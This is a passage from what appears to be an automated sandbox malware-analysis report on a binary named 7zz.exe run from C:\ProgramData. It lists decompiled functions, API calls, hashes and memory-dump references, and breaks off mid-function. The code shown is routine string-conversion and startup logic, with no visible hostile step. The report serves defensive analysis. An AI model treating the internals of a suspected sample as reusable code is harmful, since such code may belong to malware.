                                                                                  • Instruction ID: 5c3e5dd18d5ca2b0f7a6e0339bafee86ed4275ccb2fec3f011e76292e71c390b
                                                                                  • Opcode Fuzzy Hash: 82b9ebace977c017a322e84a017c4c799c7629dd4772566940a67c68c2466b10
                                                                                  • Instruction Fuzzy Hash: 2E4189310042981AEB269768DD49BFB7FECEB06704F1404F7D94DC6272D2798948CBAA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0041C936 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 93%
                                                                                  			E0041C936(void* __ecx, void* __edx) {
				intOrPtr _t59;
				void* _t69;
				intOrPtr _t77;
				intOrPtr _t78;
				void* _t89;
				void* _t96;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				void* _t103;

				_t89 = __edx;
				L0046B890(E00475600, _t103);
				_t99 = __edx;
				L004039C0(_t103 - 0x18, __ecx);
				_t2 = _t103 - 4;
				 *(_t103 - 4) =  *(_t103 - 4) & 0x00000000;
				E004054FE(_t103 - 0x18, _t89,  *_t2, 0xa);
				E00405529(_t103 - 0x18, _t89,  *_t2, _t99);
				E004054FE(_t103 - 0x18, _t89,  *_t2, 0xa);
				E00405529(_t103 - 0x18, _t89,  *_t2,  *((intOrPtr*)(_t103 + 8)));
				_t77 = _t103 - 0x24;
				L004039C0(_t77, _t103 - 0x18);
				L0046B8F4(_t103 - 0x24, 0x481390);
				_t100 = _t98;
				L0046B890(E00475614, _t103);
				_t69 = _t89;
				 *((intOrPtr*)(_t103 - 0x14)) = _t77;
				_t59 =  *((intOrPtr*)(_t69 + 8));
				_t78 = 1;
				if(_t59 > _t78) {
					_push(_t100);
					 *((intOrPtr*)(_t103 - 0x10)) = _t78;
					_t101 = 0;
					do {
						_t17 = _t101 + 4; // 0x4
						_t96 = _t17;
						if(E0040881C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x14)) + 0xc)) +  *(_t101 +  *((intOrPtr*)(_t69 + 0xc))) * 4)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x14)) + 0xc)) +  *(_t96 +  *((intOrPtr*)(_t69 + 0xc))) * 4))) == 0) {
							L00403532(_t103 - 0x20,  *0x48c33c);
							 *(_t103 - 4) =  *(_t103 - 4) & 0x00000000;
							_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x14)) + 0xc)) +  *(_t96 +  *((intOrPtr*)(_t69 + 0xc))) * 4)));
							E0041C936(_t103 - 0x20,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x14)) + 0xc)) +  *(_t101 +  *((intOrPtr*)(_t69 + 0xc))) * 4)));
							 *(_t103 - 4) =  *(_t103 - 4) | 0xffffffff;
							L00407A18( *((intOrPtr*)(_t103 - 0x20)));
						}
						 *((intOrPtr*)(_t103 - 0x10)) =  *((intOrPtr*)(_t103 - 0x10)) + 1;
						_t101 = _t96;
						_t59 =  *((intOrPtr*)(_t103 - 0x10));
					} while (_t59 <  *((intOrPtr*)(_t69 + 8)));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t103 - 0xc));
				return _t59;
			}














                                                                                  0x0041c936
                                                                                  0x0041c93b
                                                                                  0x0041c945
                                                                                  0x0041c94a
                                                                                  0x0041c94f
                                                                                  0x0041c94f
                                                                                  0x0041c958
                                                                                  0x0041c961
                                                                                  0x0041c96b
                                                                                  0x0041c976
                                                                                  0x0041c97e
                                                                                  0x0041c982
                                                                                  0x0041c990
                                                                                  0x0041c995
                                                                                  0x0041c99b
                                                                                  0x0041c9a4
                                                                                  0x0041c9a6
                                                                                  0x0041c9ab
                                                                                  0x0041c9ae
                                                                                  0x0041c9b1
                                                                                  0x0041c9b3
                                                                                  0x0041c9b5
                                                                                  0x0041c9b8
                                                                                  0x0041c9ba
                                                                                  0x0041c9c0
                                                                                  0x0041c9c0
                                                                                  0x0041c9d9
                                                                                  0x0041c9e4
                                                                                  0x0041c9ef
                                                                                  0x0041ca02
                                                                                  0x0041ca08
                                                                                  0x0041ca0d
                                                                                  0x0041ca14
                                                                                  0x0041ca19
                                                                                  0x0041ca1a
                                                                                  0x0041ca1d
                                                                                  0x0041ca1f
                                                                                  0x0041ca22
                                                                                  0x0041ca28
                                                                                  0x0041ca2d
                                                                                  0x0041ca35

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0041C93B
                                                                                    • Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922
                                                                                  • __EH_prolog.LIBCMT ref: 0041C99B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$ExceptionRaise
                                                                                  • String ID: 59@
                                                                                  • API String ID: 2062786585-2780377667
                                                                                  • Opcode ID: 07de3d3b167dcc8360909bc0b69281976f0f0c2475f3a3f050a51cf107d52f9e
                                                                                  • Instruction ID: a6f31d39d81224240f44a0bd5d30bed56bf58cfd7ee645fd7ff7855bc7c346c4
                                                                                  • Opcode Fuzzy Hash: 07de3d3b167dcc8360909bc0b69281976f0f0c2475f3a3f050a51cf107d52f9e
                                                                                  • Instruction Fuzzy Hash: 3F31A531A105059BCB14EF99C8829EEB779FF48314F50402EE906B7292DB38AE42CB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040816E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E0040816E(intOrPtr __ecx, short** __edx, void* __edi, void* __eflags) {
				intOrPtr _t36;
				int _t42;
				char* _t54;
				void* _t61;
				short** _t65;
				void* _t68;

				L0046B890(0x473818, _t68);
				 *((intOrPtr*)(_t68 - 0x10)) = __ecx;
				_t65 = __edx;
				 *((intOrPtr*)(_t68 - 0x18)) = 0;
				 *(_t68 - 0x24) = 0;
				 *(_t68 - 0x20) = 0;
				 *((intOrPtr*)(_t68 - 0x1c)) = 0;
				E00401EEE(_t68 - 0x24, 3);
				 *((intOrPtr*)(_t68 - 4)) = 0;
				 *((char*)( *((intOrPtr*)(_t68 + 0x10)))) = 0;
				_t36 =  *((intOrPtr*)(__edx + 4));
				if(_t36 != 0) {
					_t61 = _t36 + _t36;
					if(_t61 >=  *((intOrPtr*)(_t68 - 0x1c))) {
						E00401EEE(_t68 - 0x24, _t61);
					}
					_t54 = _t68 + 0xc;
					_t42 = WideCharToMultiByte( *(_t68 + 8), 0,  *_t65, _t65[1],  *(_t68 - 0x24), _t61 + 1, _t54, _t68 - 0x14);
					 *((char*)( *((intOrPtr*)(_t68 + 0x10)))) = _t54 & 0xffffff00 |  *(_t68 - 0x14) != 0x00000000;
					if(_t42 == 0) {
						 *((intOrPtr*)(_t68 + 0x10)) = 0x44e75;
						_t42 = L0046B8F4(_t68 + 0x10, 0x47e128);
					}
					( *(_t68 - 0x24))[_t42] = 0;
					 *(_t68 - 0x20) = _t42;
				}
				E00401E64( *((intOrPtr*)(_t68 - 0x10)), _t68 - 0x24);
				L00407A18( *(_t68 - 0x24));
				 *[fs:0x0] =  *((intOrPtr*)(_t68 - 0xc));
				return  *((intOrPtr*)(_t68 - 0x10));
			}









                                                                                  0x00408173
                                                                                  0x0040817c
                                                                                  0x00408182
                                                                                  0x00408189
                                                                                  0x0040818c
                                                                                  0x0040818f
                                                                                  0x00408192
                                                                                  0x00408195
                                                                                  0x0040819d
                                                                                  0x004081a0
                                                                                  0x004081a2
                                                                                  0x004081a7
                                                                                  0x004081aa
                                                                                  0x004081b0
                                                                                  0x004081b6
                                                                                  0x004081b6
                                                                                  0x004081c4
                                                                                  0x004081d3
                                                                                  0x004081e5
                                                                                  0x004081e7
                                                                                  0x004081f2
                                                                                  0x004081f9
                                                                                  0x004081f9
                                                                                  0x00408201
                                                                                  0x00408204
                                                                                  0x00408204
                                                                                  0x0040820e
                                                                                  0x00408216
                                                                                  0x00408224
                                                                                  0x0040822c

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00408173
                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000004,00000003,00000001,?,00000000,59@,00000003,?,00000000,00407F1C,00000000), ref: 004081D3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharH_prologMultiWide
                                                                                  • String ID: 59@
                                                                                  • API String ID: 3731712410-2780377667
                                                                                  • Opcode ID: 3e30b8be08c219df50001418e773fcd6df8581cd43d08f32ffd015183181abdc
                                                                                  • Instruction ID: af53ffafe5e3b4cbac78d31c94e9b62b0eb73677ea79480e45141f723c5d0b6c
                                                                                  • Opcode Fuzzy Hash: 3e30b8be08c219df50001418e773fcd6df8581cd43d08f32ffd015183181abdc
                                                                                  • Instruction Fuzzy Hash: 24213C72900249DFCB14DF99C9819EEBBF8FF49300B50446EE815B7251C739AE04CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00414B6B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E00414B6B(void* __eflags) {
				char _t32;
				void* _t37;
				char _t39;
				void* _t55;
				intOrPtr _t58;
				void* _t59;

				L0046B890(E00474780, _t59);
				_t39 = 0;
				 *((intOrPtr*)(_t59 - 0x20)) = 0;
				 *((intOrPtr*)(_t59 - 0x28)) = 0x47aacc;
				 *((intOrPtr*)(_t59 - 4)) = 0;
				if(L00413C1F(_t59 - 0x28, 0x500) != 0) {
					_t58 =  *((intOrPtr*)(_t59 - 0x20));
					_t32 = 0;
					do {
						 *((char*)(_t32 + _t58)) = _t32;
						_t32 = _t32 + 1;
					} while (_t32 < 0x100);
					if(E00414C43(_t32, _t58, 0x100) == 0x29058c73) {
						 *((intOrPtr*)(_t59 - 0x1c)) = 0x159a55e5;
						 *((intOrPtr*)(_t59 - 0x18)) = 0x1f123bb5;
						E00414C74(_t58 + 0x100, 0x400, _t59 - 0x1c);
						 *((intOrPtr*)(_t59 - 0x14)) = 0;
						do {
							_t36 =  *((intOrPtr*)(_t59 - 0x14));
							 *(_t59 - 0x10) =  *(_t59 - 0x10) & 0x00000000;
							_t55 =  *((intOrPtr*)(_t59 - 0x14)) + _t58;
							while(1) {
								_t37 = E00414C43(_t36, _t55,  *(_t59 - 0x10));
								if(_t37 != L0046B1C0(_t55,  *(_t59 - 0x10))) {
									break;
								}
								 *(_t59 - 0x10) =  *(_t59 - 0x10) + 1;
								if( *(_t59 - 0x10) < 0x20) {
									continue;
								} else {
									goto L8;
								}
								goto L10;
							}
							_t39 = 0;
							goto L10;
							L8:
							 *((intOrPtr*)(_t59 - 0x14)) =  *((intOrPtr*)(_t59 - 0x14)) + 1;
						} while ( *((intOrPtr*)(_t59 - 0x14)) < 0x4e0);
						_t39 = 1;
					}
				}
				L10:
				 *((intOrPtr*)(_t59 - 0x28)) = 0x47aacc;
				E004585E0( *((intOrPtr*)(_t59 - 0x20)));
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				return _t39;
			}









                                                                                  0x00414b70
                                                                                  0x00414b79
                                                                                  0x00414b7d
                                                                                  0x00414b80
                                                                                  0x00414b8f
                                                                                  0x00414b99
                                                                                  0x00414b9f
                                                                                  0x00414ba2
                                                                                  0x00414ba9
                                                                                  0x00414ba9
                                                                                  0x00414bac
                                                                                  0x00414bad
                                                                                  0x00414bbd
                                                                                  0x00414bce
                                                                                  0x00414bd5
                                                                                  0x00414bdc
                                                                                  0x00414be1
                                                                                  0x00414be4
                                                                                  0x00414be4
                                                                                  0x00414be7
                                                                                  0x00414beb
                                                                                  0x00414bee
                                                                                  0x00414bf3
                                                                                  0x00414c06
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00414c08
                                                                                  0x00414c0f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00414c0f
                                                                                  0x00414c3f
                                                                                  0x00000000
                                                                                  0x00414c11
                                                                                  0x00414c11
                                                                                  0x00414c14
                                                                                  0x00414c1d
                                                                                  0x00414c1d
                                                                                  0x00414bbd
                                                                                  0x00414c1f
                                                                                  0x00414c22
                                                                                  0x00414c29
                                                                                  0x00414c36
                                                                                  0x00414c3e

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: $[<A
                                                                                  • API String ID: 3519838083-980560344
                                                                                  • Opcode ID: fc09c8835bf1d1419033baf57481bdbf59988f115ef5698bf44c214e65704d7e
                                                                                  • Instruction ID: a66645b3afa9c2ee447036ac3f63c81d7f7369c510e48348743a797e60edc476
                                                                                  • Opcode Fuzzy Hash: fc09c8835bf1d1419033baf57481bdbf59988f115ef5698bf44c214e65704d7e
                                                                                  • Instruction Fuzzy Hash: BD218E70A012198BCF04EFA5C5806EEB776FFD8308F64441FC502B7241EB789A85CBA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00470889 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 93%
                                                                                  			E00470889() {
				signed int _v8;
				char _v12;
				CHAR* _t14;
				intOrPtr _t27;
				CHAR* _t37;
				intOrPtr _t41;
				intOrPtr _t46;

				_push(_t33);
				_t46 =  *0x49658c; // 0x1
				if(_t46 == 0) {
					E00471C08();
				}
				GetModuleFileNameA(0, 0x49373c, 0x104);
				_t14 =  *0x49659c; // 0x703868
				 *0x49371c = 0x49373c;
				_t37 = 0x49373c;
				if( *_t14 != 0) {
					_t37 = _t14;
				}
				E00470922(_t37, 0, 0,  &_v8,  &_v12);
				_t41 = L0046BFC5(_v12 + _v8 * 4);
				if(_t41 == 0) {
					E0046D03C(8);
				}
				E00470922(_t37, _t41, _t41 + _v8 * 4,  &_v8,  &_v12);
				_t27 = _v8 - 1;
				 *0x493704 = _t41;
				 *0x493700 = _t27;
				return _t27;
			}










                                                                                  0x0047088d
                                                                                  0x00470891
                                                                                  0x00470899
                                                                                  0x0047089b
                                                                                  0x0047089b
                                                                                  0x004708ac
                                                                                  0x004708b2
                                                                                  0x004708b7
                                                                                  0x004708bd
                                                                                  0x004708c1
                                                                                  0x004708c3
                                                                                  0x004708c3
                                                                                  0x004708d0
                                                                                  0x004708e4
                                                                                  0x004708eb
                                                                                  0x004708ef
                                                                                  0x004708f4
                                                                                  0x00470906
                                                                                  0x00470911
                                                                                  0x00470912
                                                                                  0x0047091a
                                                                                  0x00470921

                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\7zz.exe,00000104,?,?,?,?,?,?,0046CFEB), ref: 004708AC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileModuleName
                                                                                  • String ID: C:\ProgramData\7zz.exe$h8p
                                                                                  • API String ID: 514040917-1521941496
                                                                                  • Opcode ID: 374ca1ee558913e055006786c4f8ac9f9bc5f2affd582e0ef7d88b07fb241204
                                                                                  • Instruction ID: 074cebae59902112b58a1229290a15cee7db23e677cd0c16cc7fd055ee0c8137
                                                                                  • Opcode Fuzzy Hash: 374ca1ee558913e055006786c4f8ac9f9bc5f2affd582e0ef7d88b07fb241204
                                                                                  • Instruction Fuzzy Hash: 0F113DF6900118BFD711EFD5DC81CEB7BACEB05268B0140BBF549D7202E634AE448BA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004080C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E004080C7(intOrPtr __ecx, char** __edx, void* __eflags) {
				signed int _t33;
				intOrPtr _t48;
				char** _t52;
				void* _t55;

				L0046B890(0x473804, _t55);
				 *((intOrPtr*)(_t55 - 0x10)) = __ecx;
				_t52 = __edx;
				 *((intOrPtr*)(_t55 - 0x14)) = 0;
				 *(_t55 - 0x20) = 0;
				 *(_t55 - 0x1c) = 0;
				 *((intOrPtr*)(_t55 - 0x18)) = 0;
				E00401E9A(_t55 - 0x20, 3);
				_t48 =  *((intOrPtr*)(__edx + 4));
				 *((intOrPtr*)(_t55 - 4)) = 0;
				if(_t48 != 0) {
					if(_t48 >=  *((intOrPtr*)(_t55 - 0x18))) {
						E00401E9A(_t55 - 0x20, _t48);
					}
					_t33 = MultiByteToWideChar( *(_t55 + 8), 0,  *_t52, _t52[1],  *(_t55 - 0x20), _t48 + 1);
					if(_t33 == 0) {
						 *(_t55 + 8) = 0x44e74;
						_t33 = L0046B8F4(_t55 + 8, 0x47e128);
					}
					( *(_t55 - 0x20))[_t33] = 0;
					 *(_t55 - 0x1c) = _t33;
				}
				L004039C0( *((intOrPtr*)(_t55 - 0x10)), _t55 - 0x20);
				L00407A18( *(_t55 - 0x20));
				 *[fs:0x0] =  *((intOrPtr*)(_t55 - 0xc));
				return  *((intOrPtr*)(_t55 - 0x10));
			}







                                                                                  0x004080cc
                                                                                  0x004080d6
                                                                                  0x004080dc
                                                                                  0x004080e3
                                                                                  0x004080e6
                                                                                  0x004080e9
                                                                                  0x004080ec
                                                                                  0x004080ef
                                                                                  0x004080f4
                                                                                  0x004080f7
                                                                                  0x004080fc
                                                                                  0x00408101
                                                                                  0x00408107
                                                                                  0x00408107
                                                                                  0x0040811c
                                                                                  0x00408124
                                                                                  0x0040812f
                                                                                  0x00408136
                                                                                  0x00408136
                                                                                  0x0040813e
                                                                                  0x00408142
                                                                                  0x00408142
                                                                                  0x0040814c
                                                                                  0x00408154
                                                                                  0x00408163
                                                                                  0x0040816b

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004080CC
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000002,?,?,00000003,59@,?,00000000,?,?,?,?,00000000), ref: 0040811C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharH_prologMultiWide
                                                                                  • String ID: 59@
                                                                                  • API String ID: 3731712410-2780377667
                                                                                  • Opcode ID: c5154a1bd991084fb26572e5af563df919d859aa9556be1335024a578bc19ce4
                                                                                  • Instruction ID: d702833a8b0d2e9c08c0512ca54372eb887272844dd4864684de151fd06ec4aa
                                                                                  • Opcode Fuzzy Hash: c5154a1bd991084fb26572e5af563df919d859aa9556be1335024a578bc19ce4
                                                                                  • Instruction Fuzzy Hash: 8D11F9B1900119AFCF10EF9AC9819EEBBB9FF88354B40443EE545B7251D7386A41CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0046E541 Relevance: 5.0, APIs: 4, Instructions: 12COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E0046E541(void* __eax) {
				void* _t1;

				_t1 = __eax;
				InitializeCriticalSection( *0x48e0ac);
				InitializeCriticalSection( *0x48e09c);
				InitializeCriticalSection( *0x48e08c);
				InitializeCriticalSection( *0x48e06c);
				return _t1;
			}




                                                                                  0x0046e541
                                                                                  0x0046e54e
                                                                                  0x0046e556
                                                                                  0x0046e55e
                                                                                  0x0046e566
                                                                                  0x0046e569

                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(?,0046E322,?,0046CFBC), ref: 0046E54E
                                                                                  • InitializeCriticalSection.KERNEL32(?,0046E322,?,0046CFBC), ref: 0046E556
                                                                                  • InitializeCriticalSection.KERNEL32(?,0046E322,?,0046CFBC), ref: 0046E55E
                                                                                  • InitializeCriticalSection.KERNEL32(?,0046E322,?,0046CFBC), ref: 0046E566
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalInitializeSection
                                                                                  • String ID:
                                                                                  • API String ID: 32694325-0
                                                                                  • Opcode ID: dc021efed5507b4fb83a724604d938c0a9f009831836a325e097d52029dd6aec
                                                                                  • Instruction ID: 41dab6ff28bf4c48c80b7d4fe62f18fd1ff32017a734059296a2bd387a42c2bf
                                                                                  • Opcode Fuzzy Hash: dc021efed5507b4fb83a724604d938c0a9f009831836a325e097d52029dd6aec
                                                                                  • Instruction Fuzzy Hash: 03C00231811038FFCF122B67FC4494D3F66EB462603254C7AE1085203086A11C61EFEB
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

                                                                                  Execution Coverage:68.8%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:6
                                                                                  Total number of Limit Nodes:1

                                                                                  Callgraph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  • Opacity -> Relevance
                                                                                  • Disassembly available
                                                                                  callgraph 0 Function_00241020 1 Function_00241000 0->1

                                                                                  Executed Functions

                                                                                  Function 00241020 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 241020-241033 GetCommandLineA 1 241054-241056 0->1 2 241035-24103b 0->2 5 24105e-241062 1->5 6 241058-24105c 1->6 3 24104c-24104f 2->3 4 24103d 2->4 3->5 8 241051-241052 3->8 7 241040-241042 4->7 9 241064-241066 5->9 10 241070-241089 GetStartupInfoA 5->10 6->5 6->6 7->8 11 241044-24104a 7->11 8->5 9->10 12 241068-24106e 9->12 13 241090-24109d GetModuleHandleA call 241000 10->13 14 24108b 10->14 11->3 11->7 12->9 12->10 16 2410a2-2410a3 ExitProcess 13->16 14->13
                                                                                  C-Code - Quality: 100%
                                                                                  			_entry_() {
				struct _STARTUPINFOA _v72;
				char _t11;
				char _t12;
				signed int _t14;
				int _t16;
				intOrPtr _t17;
				char* _t18;

				_t18 = GetCommandLineA();
				_t11 =  *_t18;
				if(_t11 != 0x22) {
					if(_t11 <= 0x20) {
						L9:
						_t12 =  *_t18;
						if(_t12 == 0) {
							L12:
							_v72.dwFlags = 0;
							GetStartupInfoA( &_v72);
							_t14 = _v72.wShowWindow & 0x0000ffff;
							if((_v72.dwFlags & 0x00000001) == 0) {
								_t14 = 0xa;
							}
							_t16 = E00241000(GetModuleHandleA(0), 0, _t18, _t14); // executed
							ExitProcess(_t16);
						}
						while(_t12 <= 0x20) {
							_t12 =  *((intOrPtr*)(_t18 + 1));
							_t18 = _t18 + 1;
							if(_t12 != 0) {
								continue;
							}
							goto L12;
						}
						goto L12;
					} else {
						goto L8;
					}
					do {
						L8:
						_t18 = _t18 + 1;
